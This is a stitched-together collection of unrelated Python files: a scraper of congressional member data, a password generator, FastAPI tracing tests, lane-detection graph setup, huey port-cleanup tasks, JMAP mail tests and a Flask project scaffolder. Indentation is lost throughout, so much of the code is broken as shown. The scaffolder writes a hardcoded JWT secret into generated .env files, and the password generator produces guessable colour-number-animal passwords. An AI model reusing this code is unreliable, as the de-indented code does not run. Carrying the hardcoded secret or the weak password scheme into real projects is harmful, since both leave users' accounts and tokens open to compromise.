full_name = information[0]
state_district = information[1]
party = information[2]
office_room = information[3]
phone = information[4]
website = information[0].find("a").get("href")
committee_assignments = information[5]
# Pretty printing
tab = "\t\t\t"
# Escape quotes in names
get_name = str(full_name.get_text())
formatted_name = get_name.replace('"', r'\"')
# Get first and last name separately
last_name, first_name = formatted_name.split(",")
# Get state and district separately
get_state_district = str(state_district.get_text()).strip()
state, district = get_state_district.rsplit(" ", 1)
if district == "Large":
state, district, district_large = get_state_district.rsplit(" ", 2)
district = district + " " + district_large
# JSON
print_name = tab + "\"full_name\": \"" + first_name.strip() + " " + last_name.strip() + "\",\n"
print_first_name = tab + "\"first_name\": \"" + first_name.strip() + "\",\n"
print_last_name = tab + "\"last_name\": \"" + last_name.strip() + "\",\n"
print_state_district = tab + "\"state_district\": \"" + get_state_district + "\",\n"
print_state = tab + "\"state\": \"" + state + "\",\n"
print_district = tab + "\"district\": \"" + district + "\",\n"
print_party = tab + "\"party\": \"" + str(party.get_text()).strip() + "\",\n"
print_office_room = tab + "\"office_room\": \"" + str(office_room.get_text()).strip() + "\",\n"
print_phone = tab + "\"phone\": \"" + str(phone.get_text()).strip() + "\",\n"
print_website = tab + "\"website\": \"" + website + "\",\n"
print_committee_assignments = ( tab + "\"committee_assignments\": [\"" +
str(committee_assignments.get_text('", "', strip=True)).strip() + "\"]\n" )
print_all = (
"\t\t{\n" +
print_name +
print_first_name +
print_last_name +
print_state_district +
print_state +
print_district +
print_party +
print_office_room +
print_phone +
print_website +
print_committee_assignments +
"\t\t},\n"
)
# Remove trailing comma at end of JSON
if representative == representatives[-1]:
print_all = print_all[:-2] + "\n\t]\n}"
json.write(print_all)
json.close()
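# A sketch of the same serialization using the json module instead of manual
# string concatenation; "members" stands for the per-representative dicts
# assembled in the loop above, and the alias avoids the file handle named
# "json" in this script. A hypothetical refactor, not the script's own code.
import json as json_lib

def write_members(members, path):
    # members: a list of dicts with the same keys printed above
    with open(path, "w") as f:
        json_lib.dump({"members": members}, f, indent=2)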
|
nilq/baby-python
|
python
|
#PasswordGenerator GGearing314 01/10/19
from random import *
case=randint(1,2)
number=randint(1,99)
animals=("ant","alligator","baboon","badger","barb","bat","beagle","bear","beaver","bird","bison","bombay","bongo","booby","butterfly","bee","camel","cat","caterpillar","catfish","cheetah","chicken","chipmunk","cow","crab","deer","dingo","dodo","dog","dolphin","donkey","duck","eagle","earwig","elephant","emu","falcon","ferret","fish","flamingo","fly","fox","frog","gecko","gibbon","giraffe","goat","goose","gorilla")
colour=("red","orange","yellow","green","blue","indigo","violet","purple","magenta","cyan","pink","brown","white","grey","black")
chosenanimal = choice(animals)  # choice avoids the off-by-one IndexError risked by randint(0, len(animals))
chosencolour = choice(colour)
if case==1:
chosenanimal=chosenanimal.upper()
print(chosencolour,number,chosenanimal)
else:
chosencolour=chosencolour.upper()
print(chosenanimal,number,chosencolour)
#print("This program has exatly ",(len(animals)*len(colour)*99*2),"different combinations") #I'm not sure this is right
input("Press enter to close...")
|
nilq/baby-python
|
python
|
from thundra import constants
from thundra.context.execution_context_manager import ExecutionContextManager
from thundra.wrappers.fastapi.fastapi_wrapper import FastapiWrapper
from thundra.context.tracing_execution_context_provider import TracingExecutionContextProvider
from thundra.context.global_execution_context_provider import GlobalExecutionContextProvider
from thundra.wrappers import wrapper_utils
import pytest
def test_fastapi_hooks_called(test_app, monkeypatch):
def mock_before_request(self, request, req_body):
ExecutionContextManager.set_provider(TracingExecutionContextProvider())
execution_context = wrapper_utils.create_execution_context()
execution_context.platform_data["request"] = request
execution_context.platform_data["request"]["body"] = req_body
self.plugin_context.request_count += 1
self.execute_hook("before:invocation", execution_context)
assert execution_context.root_span.operation_name == '/1'
assert execution_context.root_span.get_tag('http.method') == 'GET'
assert execution_context.root_span.get_tag('http.host') == 'testserver'
assert execution_context.root_span.get_tag('http.query_params') == b''
assert execution_context.root_span.get_tag('http.path') == '/1'
assert execution_context.root_span.class_name == constants.ClassNames['FASTAPI']
assert execution_context.root_span.domain_name == 'API'
return execution_context
def mock_after_request(self, execution_context):
assert execution_context.response.body == b'{"hello_world":1}'
assert execution_context.response.status_code == 200
self.prepare_and_send_reports_async(execution_context)
ExecutionContextManager.clear()
monkeypatch.setattr(FastapiWrapper, "before_request", mock_before_request)
monkeypatch.setattr(FastapiWrapper, "after_request", mock_after_request)
response = test_app.get('/1')
def test_fastapi_errornous(test_app, monkeypatch):
try:
def mock_error_handler(self, error):
execution_context = ExecutionContextManager.get()
if error:
execution_context.error = error
self.prepare_and_send_reports_async(execution_context)
assert error.type == "RuntimeError"
assert error.message == "Test Error"
monkeypatch.setattr(FastapiWrapper, "error_handler", mock_error_handler)
test_app.get('/error')
    except Exception:
        # the endpoint is expected to raise; the assertions run in mock_error_handler
        pass
|
nilq/baby-python
|
python
|
import lanelines
from compgraph import CompGraph, CompGraphRunner
import numpy as np
import cv2
func_dict = {
'warp': lanelines.warp,
'gray': lanelines.gray,
'get_HLS': lanelines.get_hls_channels,
'weighted_HLS_sum': lanelines.weighted_HLS,
'threshold_gray': lanelines.mask_threashold_range,
'threshold_S': lanelines.mask_threashold_range,
'threshold_wHLS': lanelines.mask_threashold_range,
'apply_sobel_x_to_S': lanelines.scaled_sobel_x,
'threshold_S_sobel_x': lanelines.mask_threashold_range,
'median_blur_tssx': cv2.medianBlur,
'close_thresholded_S': lanelines.morphological_close,
'gather_thresholded_images': lanelines.gather_thresholded_images,
'combine_thresholds_bitwise_or': lanelines.bitwise_or,
'get_target_cells_coordinates': lanelines.get_target_cells_coordinates,
'fit_lane_polynomials': lanelines.fit_lane_polynomials,
}
func_io = {
'warp': (('image', 'M', 'canvas_size'), 'warped'),
'gray': ('warped', 'warped_gray'),
'get_HLS': ('warped', ('H', 'L', 'S')),
'weighted_HLS_sum': (('H', 'L', 'S', 'HLS_weights'), 'weighted_HLS'),
'threshold_gray': (('warped_gray', 'gray_from', 'gray_to'), 'thresholded_gray'),
'threshold_S': (('S', 'S_from', 'S_to'), 'thresholded_S'),
'threshold_wHLS': (('weighted_HLS', 'wHLS_from', 'wHLS_to'), 'thresholded_wHLS'),
'apply_sobel_x_to_S': ('S', 'S_sobel_x'),
'threshold_S_sobel_x': (('S_sobel_x', 'S_sobel_x_from', 'S_sobel_x_to'), 'thresholded_S_sobel_x'),
'median_blur_tssx': (('thresholded_S_sobel_x', 'tssx_median_kernel'), 'tssx_median'),
'close_thresholded_S': (('thresholded_S', 'close_kernel_for_tS'), 'ts_closed'),
'gather_thresholded_images' : (
('thresholded_S', 'thresholded_wHLS', 'thresholded_S_sobel_x', 'tssx_median', 'ts_closed', 'thresholded_gray'),
'thresholded_images'
),
'combine_thresholds_bitwise_or': ('thresholded_images', 'all_thresholds'),
'get_target_cells_coordinates': (
('all_thresholds', 'n_cells_x', 'n_cells_y', 'cell_threshold'),
('estpoints_left', 'estpoints_right'),
),
'fit_lane_polynomials': (
('estpoints_left', 'estpoints_right'),
('p_coefs_left', 'p_coefs_right')
),
}
computational_graph = CompGraph(func_dict, func_io)
parameters = {
'canvas_size': (500, 1500),
'HLS_weights': [0, 0.4, 1.],
'gray_from': 210,
'gray_to': 255,
'S_from': 180,
'S_to': 255,
'wHLS_from': 180,
'wHLS_to': 255,
'S_sobel_x_from': 20,
'S_sobel_x_to': 240,
'tssx_median_kernel': 5,
'close_kernel_for_tS': (3, 3),
'n_cells_x': 50,
'n_cells_y': 100,
'cell_threshold': 70,
}
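# Hypothetical usage of the graph defined above; the CompGraphRunner calls
# below are assumptions based on the unused import at the top, not taken
# from the library's documentation.
# runner = CompGraphRunner(computational_graph, frozen_tokens=parameters)
# runner.run(image=frame_bgr, M=perspective_matrix)
# left_fit, right_fit = runner['p_coefs_left'], runner['p_coefs_right']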
|
nilq/baby-python
|
python
|
import time
import typing as t
from huey import crontab
from app.db.session import db_session
from app.db.crud.server import get_server_with_ports_usage
from app.db.crud.port_forward import get_forward_rule, get_all_expire_rules
from app.db.models.port import Port
from .config import huey
from tasks.ansible import ansible_hosts_runner
from tasks.utils.runner import run
from tasks.utils.handlers import iptables_finished_handler
def clean_finished_handler(runner):
ansible_hosts_runner()
@huey.task()
def clean_runner(server: t.Dict):
run(
server=server,
playbook="clean.yml",
finished_callback=clean_finished_handler,
)
@huey.task(priority=4)
def clean_port_runner(server_id: int, port: Port, update_traffic: bool = True):
with db_session() as db:
if db_forward_rule := get_forward_rule(db, server_id, port.id):
db.delete(db_forward_rule)
db.commit()
server = get_server_with_ports_usage(db, server_id)
run(
server=server,
playbook="clean_port.yml",
extravars={"local_port": port.num},
finished_callback=iptables_finished_handler(
server.id, accumulate=True, update_traffic_bool=update_traffic
),
)
@huey.periodic_task(crontab(minute="*"), priority=4)
def clean_expired_port_runner():
with db_session() as db:
db_expire_rules = get_all_expire_rules(db)
for db_rule in db_expire_rules:
if time.time() > db_rule.config.get("expire_time", float("inf")):
clean_port_runner(
db_rule.port.server.id,
db_rule.port,
update_traffic=True,
)
|
nilq/baby-python
|
python
|
# This is an exact clone of identification.py with functions renamed for clarity and all code relating to creating an
# alignment removed
from typing import Tuple
import sys
import os
path_to_src = (os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.append(path_to_src)
from src.objects import Database, Spectrum, MPSpectrumID, DEVFallOffEntry
from src.preprocessing import merge_search, preprocessing_utils
from src import database
from src.file_io import JSON
import time
import copy
import json
# top results to keep for creating an alignment
TOP_X = 50
def database_and_spectra_preprocessing(
spectra_files: str,
database_file: str,
verbose: bool = True,
min_peptide_len: int = 5,
max_peptide_len: int = 20,
peak_filter: int = 0,
relative_abundance_filter: float = 0.0,
ppm_tolerance: int = 20,
precursor_tolerance: int = 10,
digest: str = '',
cores: int = 1,
n: int = 5,
DEBUG: bool = False,
truth_set: str = '',
output_dir: str = ''
) -> dict:
# build/load the database
verbose and print('Loading database...')
db = database.build(database_file)
verbose and print('Done')
# load all of the spectra
verbose and print('Loading spectra...')
spectra, boundaries = preprocessing_utils.load_spectra(
spectra_files,
ppm_tolerance,
peak_filter=peak_filter,
relative_abundance_filter=relative_abundance_filter
)
verbose and print('Done')
# get the boundary -> kmer mappings for b and y ions
matched_masses_b, matched_masses_y, db = merge_search.modified_match_masses(boundaries, db, max_peptide_len, DEBUG)
# # if we only get 1 core, don't do the multiprocessing bit
# if cores == 1:
# # go through and id all spectra
# for i, spectrum in enumerate(spectra):
# print(f'Creating alignment for spectrum {i+1}/{len(spectra)} [{to_percent(i+1, len(spectra))}%]', end='\r')
# # get b and y hits
# b_hits, y_hits = [], []
# for mz in spectrum.spectrum:
# # get the correct boundary
# mapped = mz_mapping[mz]
# b = boundaries[mapped]
# b = hashable_boundaries(b)
# if b in matched_masses_b:
# b_hits += matched_masses_b[b]
# if b in matched_masses_y:
# y_hits += matched_masses_y[b]
return db
|
nilq/baby-python
|
python
|
from .base import NextcloudManager
class NextcloudGroupManager(NextcloudManager):
def all(self, search=None):
"""
Get all nextcloud groups
"""
request = self.api.get_groups(search=search)
self.check_request(request)
objs = []
for name in request.data['groups']:
objs.append(self.get(name))
return objs
def get(self, name=None, **kwargs):
"""
Get a specific nextcloud group
"""
return super().get(name=name, **kwargs)
|
nilq/baby-python
|
python
|
import numpy as np
import matplotlib.pyplot as plt
from soundsig.plots import multi_plot
"""
Implementation of S. Zayd Enam's STRF modeling stuff:
S. Zayd Enam, Michael R. DeWeese, "Spectro-Temporal Models of Inferior Colliculus Neuron Receptive Fields"
http://users.soe.ucsc.edu/~afletcher/hdnips2013/papers/strfmodels_plos.pdf
"""
def onset_strf(t, f, t_c=0.150, t_freq=10.0, t_phase=0.0, t_sigma=0.250, f_c=3000.0, f_sigma=500.0):
T,F = np.meshgrid(t, f)
f_part = np.exp(-(F - f_c)**2 / (2*f_sigma**2))
t_part = np.sin(2*np.pi*t_freq*(T - t_c) + t_phase)
exp_part = np.exp( (-(T - t_c)**2 / (2*t_sigma**2)) )
strf = t_part*f_part*exp_part
strf /= np.abs(strf).max()
return strf
def checkerboard_strf(t, f, t_freq=10.0, t_phase=0.0,
f_freq=1e-6, f_phase=0.0, t_c=0.150, f_c=3000.0,
t_sigma=0.050, f_sigma=500.0, harmonic=False):
T,F = np.meshgrid(t, f)
t_part = np.cos(2*np.pi*t_freq*T + t_phase)
f_part = np.cos(2*np.pi*f_freq*F + f_phase)
exp_part = np.exp( (-(T-t_c)**2 / (2*t_sigma**2)) - ((F - f_c)**2 / (2*f_sigma**2)) )
if harmonic:
f_part = np.abs(f_part)
strf = t_part*f_part*exp_part
strf /= np.abs(strf).max()
return strf
def sweep_strf(t, f, theta=0.0, aspect_ratio=1.0, phase=0.0, wavelength=0.5, spread=1.0, f_c=5000.0, t_c=0.0):
T,F = np.meshgrid(t-t_c, f-f_c)
T /= np.abs(T).max()
F /= np.abs(F).max()
Tp = T*np.cos(theta) + F*np.sin(theta)
Fp = -T*np.sin(theta) + F*np.cos(theta)
exp_part = np.exp( -(Tp**2 + (aspect_ratio**2 * Fp**2)) / (2*spread**2) )
cos_part = np.cos( (2*np.pi*Tp / wavelength) + phase)
return exp_part*cos_part
def plot_strf(pdata, ax):
strf = pdata['strf']
absmax = np.abs(strf).max()
plt.imshow(strf, interpolation='nearest', aspect='auto', origin='lower',
extent=plot_extent, vmin=-absmax, vmax=absmax, cmap=plt.cm.seismic)
plt.title(pdata['title'])
plt.xticks([])
plt.yticks([])
if __name__ == '__main__':
nt = 100
    t = np.linspace(0.0, 0.250, nt)
nf = 100
f = np.linspace(300.0, 8000.0, nf)
plot_extent = [t.min(), t.max(), f.min(), f.max()]
#build onset STRFs of varying center frequency and temporal bandwidths
onset_f_sigma = 500
onset_f_c = np.linspace(300.0, 8000.0, 10)
onset_t_sigmas = np.array([0.005, 0.010, 0.025, 0.050])
onset_t_freqs = np.array([20.0, 15.0, 10.0, 5.0])
onset_plist = list()
for f_c in onset_f_c:
for t_sigma,t_freq in zip(onset_t_sigmas, onset_t_freqs):
t_c = 0.5*(1.0 / t_freq) - 0.010
strf = onset_strf(t, f, t_freq=t_freq, t_phase=np.pi, f_c=f_c, f_sigma=1000.0, t_sigma=t_sigma, t_c=t_c)
title = '$f_c$=%dHz, $\sigma_t$=%dms, $f_t$=%dHz' % (f_c, t_sigma*1e3, t_freq)
onset_plist.append({'strf':strf, 'title':title})
multi_plot(onset_plist, plot_strf, nrows=len(onset_f_c), ncols=len(onset_t_sigmas))
#build harmonic stack STRFs
stack_t_sigma = 0.005
stack_f_sigma = 1500
stack_f_c = np.linspace(300.0, 8000.0, 10)
stack_f_freq = np.linspace(1e-4, 7e-4, 5)
stack_t_freqs = np.array([20.0, 15.0, 10.0, 5.0])
stack_plist = list()
for f_c in stack_f_c:
for f_freq in stack_f_freq:
strf = checkerboard_strf(t, f,
t_freq=10.0, t_phase=0.0,
f_freq=f_freq, f_phase=0.0,
t_c=0.015, f_c=f_c,
t_sigma=stack_t_sigma, f_sigma=stack_f_sigma, harmonic=False)
title = '$f_c$=%dHz, f_freq=%0.6f' % (f_c, f_freq)
stack_plist.append({'strf':strf, 'title':title})
multi_plot(stack_plist, plot_strf, nrows=len(stack_f_c), ncols=len(stack_f_freq))
#build frequency sweep STRFs
sweep_wavelengths = np.array([0.25, 0.5, 0.75])
sweep_spreads = np.array([0.100, 0.150, 0.200, 0.250])
sweep_thetas = np.array([-np.pi/8, -np.pi/6, -np.pi/4, np.pi/4, np.pi/6, np.pi/8])
sweep_plist = list()
for wavelength,spread in zip(sweep_wavelengths, sweep_spreads):
for theta in sweep_thetas:
t_c = 0.1*wavelength
strf = sweep_strf(t, f, theta=theta, wavelength=wavelength, spread=spread, t_c=t_c)
title = '$\lambda$=%0.3f, $\\theta$=%d$\degree$' % (wavelength, theta*(180.0 / np.pi))
sweep_plist.append({'strf':strf, 'title':title})
multi_plot(sweep_plist, plot_strf, nrows=len(sweep_wavelengths), ncols=len(sweep_thetas))
plt.show()
|
nilq/baby-python
|
python
|
import binascii
import pytest
from random import random
import jmap
from jmap import errors
@pytest.mark.asyncio
async def test_mailbox_get_all(account, idmap):
response = await account.mailbox_get(idmap)
assert response['accountId'] == account.id
assert int(response['state']) > 0
assert isinstance(response['notFound'], list)
assert len(response['notFound']) == 0
assert isinstance(response['list'], list)
assert len(response['list']) > 0
for mailbox in response['list']:
assert mailbox['id']
assert mailbox['name']
assert mailbox['myRights']
assert 'role' in mailbox
assert 'sortOrder' in mailbox
assert 'totalEmails' in mailbox
assert 'totalThreads' in mailbox
assert 'unreadThreads' in mailbox
assert 'isSubscribed' in mailbox
assert 'parentId' in mailbox
@pytest.mark.asyncio
async def test_mailbox_get_notFound(account, idmap):
wrong_ids = ['notexisting', 123]
properties = ['name', 'myRights']
response = await account.mailbox_get(
idmap,
ids=wrong_ids,
properties=properties,
)
assert response['accountId'] == account.id
assert int(response['state']) > 0
assert isinstance(response['notFound'], list)
assert set(response['notFound']) == set(wrong_ids)
assert isinstance(response['list'], list)
assert len(response['list']) == 0
@pytest.mark.asyncio
async def test_mailbox_set_fail(account, idmap):
with pytest.raises(errors.stateMismatch):
await account.mailbox_set(idmap, ifInState='wrongstate')
@pytest.mark.asyncio
async def test_mailbox_create_duplicate(account, idmap):
response = await account.mailbox_set(
idmap,
create={
"test": {
"parentId": None,
"name": 'INBOX',
}
}
)
assert response['notCreated']['test']['type'] == 'invalidArguments'
@pytest.mark.asyncio
async def test_mailbox_create_rename_destroy(account, idmap, inbox_id):
# Create
response = await account.mailbox_set(
idmap,
create={
"test": {
"parentId": inbox_id,
"name": str(random())[2:10],
"isSubscribed": False,
}
}
)
newId = response['created']['test']['id']
assert not response['notCreated']
assert not response['updated']
assert not response['notUpdated']
assert not response['destroyed']
assert not response['notDestroyed']
# Rename
update = {newId: {"name": " ÁÝŽ-\\"}}
response = await account.mailbox_set(idmap, update=update)
assert not response['created']
assert not response['notCreated']
assert response['updated'] == update
assert not response['notUpdated']
    assert not response['destroyed']
    assert not response['notDestroyed']
# Destroy
response = await account.mailbox_set(idmap, destroy=[newId])
assert not response['created']
assert not response['notCreated']
assert not response['updated']
assert not response['notUpdated']
assert response['destroyed'] == [newId]
assert not response['notDestroyed']
@pytest.mark.asyncio
async def test_mailbox_query(account, inbox_id):
response = await account.mailbox_query(
filter={"parentId": inbox_id},
sort=[{"property": "sortOrder"},{"property": "name"}],
position=0,
limit=10,
calculateTotal=True,
)
assert response['accountId'] == account.id
assert isinstance(response['ids'], list)
assert 0 < len(response['ids']) <= 10
@pytest.mark.asyncio
async def test_email_query_inMailbox(account, inbox_id, email_id):
response = await account.email_query(**{
"filter": {"inMailbox": inbox_id},
"anchor": email_id,
"collapseThreads": False,
"limit": 10,
"calculateTotal": True
})
assert response['accountId'] == account.id
assert response['position'] > 0
assert response['total'] > 0
assert response['collapseThreads'] == False
assert response['queryState']
assert isinstance(response['ids'], list)
assert 0 < len(response['ids']) <= 10
assert response['canCalculateChanges'] in (True, False)
@pytest.mark.asyncio
async def test_email_get_all(account, idmap, uidvalidity):
response = await account.email_get(idmap)
assert response['accountId'] == account.id
assert isinstance(response['list'], list)
assert 0 < len(response['list']) <= 1000
assert response['notFound'] == []
for msg in response['list']:
assert msg['id']
assert msg['threadId']
@pytest.mark.asyncio
async def test_email_get(account, idmap, uidvalidity, email_id, email_id2):
properties = {
'threadId', 'mailboxIds', 'inReplyTo', 'keywords', 'subject',
'sentAt', 'receivedAt', 'size', 'blobId',
'from', 'to', 'cc', 'bcc', 'replyTo',
'attachments', 'hasAttachment',
'headers', 'preview', 'body',
}
good_ids = [email_id, email_id2]
wrong_ids = [
"notsplit",
"not-int",
f"{uidvalidity}-{1 << 33}",
f"{uidvalidity}-{1 << 32}",
f"{uidvalidity}-{(1<<32)-1}",
f"{uidvalidity}-0",
f"{uidvalidity}--10",
f"{uidvalidity}-1e2",
f"{uidvalidity}-str",
1234,
]
response = await account.email_get(
idmap,
ids=good_ids + wrong_ids,
properties=list(properties),
maxBodyValueBytes=1024,
)
assert response['accountId'] == account.id
assert isinstance(response['list'], list)
assert len(response['list']) == 2
assert isinstance(response['notFound'], list)
assert set(response['notFound']) == set(wrong_ids)
for msg in response['list']:
assert msg['id'] in good_ids
for prop in properties - {'body'}:
assert prop in msg
assert 'textBody' in msg or 'htmlBody' in msg
@pytest.mark.asyncio
async def test_email_query_get_threads(account, idmap, inbox_id):
response = await account.email_query(**{
"filter": {"inMailbox": inbox_id},
"sort": [{"property": "receivedAt", "isAscending": False}],
"collapseThreads": True,
"position": 0,
"limit": 30,
"calculateTotal": True,
})
response = await account.email_get(idmap, ids=response['ids'], properties=["threadId"])
assert isinstance(response['notFound'], list)
assert len(response['notFound']) == 0
assert isinstance(response['list'], list)
assert len(response['list']) == 30
for msg in response['list']:
assert msg['id']
assert msg['threadId']
thread_ids = [msg['threadId'] for msg in response['list']]
response = await account.thread_get(idmap, ids=thread_ids)
assert len(response['notFound']) == 0
assert len(response['list']) >= 30
email_ids = []
for thread in response['list']:
assert thread['id']
assert thread['emailIds']
email_ids.extend(thread['emailIds'])
properties = ["threadId","mailboxIds","keywords",
"hasAttachment","from","to","subject",
"receivedAt","size","preview"]
response = await account.email_get(idmap, ids=email_ids, properties=properties)
assert len(response['notFound']) == 0
assert len(response['list']) >= 30
for msg in response['list']:
for prop in properties:
assert prop in msg
@pytest.mark.asyncio
async def test_email_get_detail(account, idmap, email_id):
properties = {
"blobId", "messageId", "inReplyTo", "references",
"header:list-id:asText", "header:list-post:asURLs",
"sender", "cc", "bcc", "replyTo", "sentAt",
"bodyStructure", "bodyValues",
}
bodyProperties = [
"partId", "blobId", "size", "name", "type",
"charset", "disposition", "cid", "location",
]
response = await account.email_get(idmap, **{
"ids": [email_id],
"properties": list(properties),
"fetchHTMLBodyValues": True,
"bodyProperties": bodyProperties,
})
assert response['accountId'] == account.id
assert isinstance(response['notFound'], list)
assert len(response['notFound']) == 0
assert isinstance(response['list'], list)
assert len(response['list']) == 1
for msg in response['list']:
for prop in properties - {'body'}:
assert prop in msg
@pytest.mark.asyncio
async def test_email_setget_seen(account, idmap, email_id):
for state in (True, False):
response = await account.email_set(
idmap,
update={
email_id: {"keywords/$seen": state}
}
)
assert response['accountId'] == account.id
assert isinstance(response['updated'], dict)
assert isinstance(response['notUpdated'], dict)
assert isinstance(response['created'], dict)
assert isinstance(response['notCreated'], dict)
assert isinstance(response['destroyed'], list)
assert isinstance(response['notDestroyed'], dict)
assert len(response['updated']) > 0
assert len(response['notUpdated']) == 0
assert len(response['created']) == 0
assert len(response['notCreated']) == 0
assert len(response['destroyed']) == 0
assert len(response['notDestroyed']) == 0
response = await account.email_get(
idmap,
ids=[email_id],
properties=['keywords']
)
assert response['list'][0]['id'] == email_id
assert response['list'][0]['keywords'].get('$seen', False) == state
@pytest.mark.asyncio
async def test_email_create_destroy(account, idmap, inbox_id):
async def create_stream():
yield binascii.a2b_base64("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVQYV2NgYAAAAAMAAWgmWQ0AAAAASUVORK5CYII=")
res = await account.upload(create_stream(), 'image/png')
attachmentBlobId = res['blobId']
email = {
"mailboxIds": [inbox_id],
"to": [{
"name": "Filip Hanes",
"email": "filip.hanes@example.com"
}],
"bodyValues": {
"1": {
"type": "text/plain",
"value": "Hi,\nwhats'up wonderful person?",
},
"2": {
"type": "text/html",
"value": "<p>Hi,</p><p>whats'up wonderful person?</p>",
},
},
"textBody": [{
'partId': "1",
'type': "text/plain",
}],
"htmlBody": [{
'partId': "2",
'type': "text/html",
}],
"attachments": [
{
'blobId': attachmentBlobId,
'type': "image/png",
'name': "picture.png",
'cid': "picture.png",
'disposition': 'attachment',
},
]
}
response = await account.email_set(idmap, create={"test": email})
assert response['created']['test']['id']
blobId = response['created']['test']['blobId']
assert blobId
body = await account.download(blobId)
assert body
@pytest.mark.asyncio
async def test_email_changes(account, uidvalidity):
response = await account.email_changes(sinceState=f"{uidvalidity},1,1", maxChanges=3000)
changes = response['created'] + response['updated'] + response['removed']
assert 0 < len(changes) < 3000
@pytest.mark.asyncio
async def test_thread_changes(account, uidvalidity):
response = await account.thread_changes(sinceState=f"{uidvalidity},1,10", maxChanges=30)
changes = response['created'] + response['updated'] + response['removed']
assert 0 < len(changes) < 30
@pytest.mark.asyncio
async def test_mailbox_changes(account):
with pytest.raises(jmap.errors.cannotCalculateChanges):
await account.mailbox_changes(sinceState="1", maxChanges=300)
|
nilq/baby-python
|
python
|
from ocha.libs import utils
import os, yaml
from ocha.libs import setting
def create_production_env(data_env, app_path):
host = data_env['app']['host']
port = data_env['app']['port']
f=open(app_path+"/production.sh", "a+")
f.write("gunicorn production:app -b "+str(host)+":"+str(port)+" -w 2 --chdir "+app_path+"/")
f.close()
def create_env(data_env, app_path):
db_driver = None
try:
db_driver = data_env['database']['driver']
except Exception:
db_driver = "cockroachdb"
env_check = None
try:
env_check = data_env['app']['environment']
except Exception as e:
print(e)
env_sett = ""
if env_check:
if env_check == 'production':
env_sett = "False"
else:
env_sett = "True"
f=open(app_path+"/.env", "a+")
# APP CONFIG
f.write("APP_NAME = "+data_env['app']['name'])
f.write("\n")
f.write("APP_HOST = "+data_env['app']['host'])
f.write("\n")
f.write("APP_PORT = "+str(data_env['app']['port']))
f.write("\n")
f.write("FLASK_DEBUG = "+env_sett)
f.write("\n")
f.write("\n")
# MEMCACHE CONFIG
f.write("MEMCACHE_HOST = "+data_env['app']['host'])
f.write("\n")
f.write("MEMCACHE_PORT = 11211")
f.write("\n")
f.write("\n")
# DATABASE CONFIG
f.write("DB_NAME = "+data_env['database']['name'])
f.write("\n")
f.write("DB_HOST = "+data_env['database']['host'])
f.write("\n")
f.write("DB_PORT = "+str(data_env['database']['port']))
f.write("\n")
f.write("DB_USER = "+data_env['database']['username'])
f.write("\n")
f.write("DB_SSL = "+data_env['database']['ssl'])
f.write("\n")
f.write("DB_DRIVER = "+db_driver)
f.write("\n")
f.write("\n")
# REDIS CONFIG
f.write("FLASK_REDIS_URL = redis://:"+data_env['redis']['password']+"@"+str(data_env['redis']['host'])+":"+str(data_env['redis']['port'])+"/0")
f.write("\n")
f.write("\n")
f.write("JWT_SECRET_KEY = wqertyudfgfhjhkcxvbnmn@123$32213")
f.close()
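# For reference, a create_env call produces a .env shaped like the following
# (the values here are illustrative, not defaults shipped with this package):
#
#   APP_NAME = myapp
#   APP_HOST = 127.0.0.1
#   APP_PORT = 5000
#   FLASK_DEBUG = True
#   MEMCACHE_HOST = 127.0.0.1
#   MEMCACHE_PORT = 11211
#   DB_NAME = mydb
#   DB_HOST = 127.0.0.1
#   DB_PORT = 26257
#   DB_USER = root
#   DB_SSL = disable
#   DB_DRIVER = cockroachdb
#   FLASK_REDIS_URL = redis://:secret@127.0.0.1:6379/0
#   JWT_SECRET_KEY = ...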
def create_file_controller(nm_controller, app_path, security):
controller_path = app_path+"/app/controllers/api"
file_controller_path = controller_path+"/"+nm_controller+".py"
create_controller(nm_controller,file_controller_path, security)
def create_controller(nm_controller, file_controller_path, security):
sec_value = ""
if security == True:
sec_value = "@jwt_required"
nm_ctrl = nm_controller.capitalize()
f=open(file_controller_path, "a+")
value_ctrl = """from flask_restful import Resource, reqparse, request
from app.helpers.rest import response
from app.helpers import cmd_parser as cmd
from app import psycopg2
from app.libs import utils
from app.models import model as db
from app.middlewares.auth import jwt_required
from app.helpers import endpoint_parse as ep
import json
class """+nm_ctrl+"""(Resource):
"""+sec_value+"""
def post(self):
json_req = request.get_json(force=True)
command = utils.get_command(request.path)
command = command
init_data = cmd.parser(json_req, command)
a = ep.endpoint_parser(command, init_data)
return response(200, data=a)
"""
f.write(value_ctrl)
f.close()
def read_app(app_name, path=None):
if path is None:
app_path = utils.APP_HOME+"/BLESS/"+app_name
else:
app_path = path+"/"+app_name
if not os.path.exists(app_path):
return None
else:
return app_path
def set_endpoint_template(endpoint_obj, app_path):
endpoint_fix = {
"endpoint": endpoint_obj
}
endpoint_value = yaml.dump(endpoint_fix)
template_path = app_path+"/app/static/templates/endpoint.yml"
f=open(template_path, "a+")
f.write(endpoint_value)
f.close()
def create_app(app_name, app_framework, path=None):
url_git = "https://github.com/Blesproject/bless_"+app_framework+".git"
if path is None:
app_path = utils.APP_HOME+"/BLESS"
dst_path = app_path+"/"+app_name
else:
app_path = path
dst_path = app_path+"/"+app_name
if not os.path.exists(app_path):
os.makedirs(app_path)
# copy(flask_path,dst_path)
try:
clone = utils.template_git(url=url_git, dir=dst_path)
except Exception as e:
print(str(e))
else:
return True
else:
# copy(flask_path,dst_path)
try:
clone = utils.template_git(url=url_git, dir=dst_path)
except Exception as e:
print(str(e))
else:
return False
def create_routing(endpoint_obj, app_path):
init_import = "from flask import Blueprint\nfrom flask_restful import Api \nfrom .user import *\nfrom .auth import *\n"
ctrl_import = ""
for i in endpoint_obj:
ctrl_import += "from ."+i+" import * \n"
p_import = init_import+ctrl_import
value_start = """\n\napi_blueprint = Blueprint("api", __name__, url_prefix='/api')
api = Api(api_blueprint)
api.add_resource(UserdataResource, '/user')
api.add_resource(UserdataResourceById, '/user/<userdata_id>')
api.add_resource(UserdataInsert, '/user')
api.add_resource(UserdataUpdate, '/user/<userdata_id>')
api.add_resource(UserdataRemove, '/user/<userdata_id>')
api.add_resource(Usersignin, '/sign')
api.add_resource(UserTokenRefresh, '/sign/token')
api.add_resource(UserloginInsert, '/user/add')\n"""
value_default = p_import+value_start
add_resource_data = ""
for a in endpoint_obj:
ctrl_class = a.capitalize()
add_resource_data += "api.add_resource("+ctrl_class+", '/"+a+"')\n"
all_value = value_default+ add_resource_data
init_path = app_path+"/app/controllers/api/__init__.py"
f=open(init_path, "a+")
f.write(all_value)
f.close()
def create_moduls(moduls_name, moduls_data, app_path, sync_md=None):
